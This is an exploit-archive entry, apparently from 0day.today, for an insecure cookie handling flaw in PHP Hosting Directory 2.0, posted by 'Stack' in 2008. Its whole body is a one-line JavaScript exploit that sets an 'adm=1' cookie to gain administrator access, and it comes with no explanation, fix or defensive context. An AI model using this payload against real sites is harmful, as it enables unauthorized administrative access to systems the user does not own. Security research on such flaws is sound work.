id: 3474
date: 07/29/2008
title: PHP Hosting Directory 2.0 Insecure Cookie Handling Vulnerability
author: Stack
cves: 

================================================================
PHP Hosting Directory 2.0 Insecure Cookie Handling Vulnerability
================================================================



# PHP Hosting Directory 2.0 Insecure Cookie Handling Vulnerability  
# Name Of Script : PHP Hosting Directory 2.0
# Download From : http://jnshosts.com/download/phphost_directory.zip
# Discoverd By :Stack
---
exploit:
javascript:document.cookie = "adm=1; path=/"; document.cookie = "adm=1; path=/";



#  0day.today [2023-03-26]  #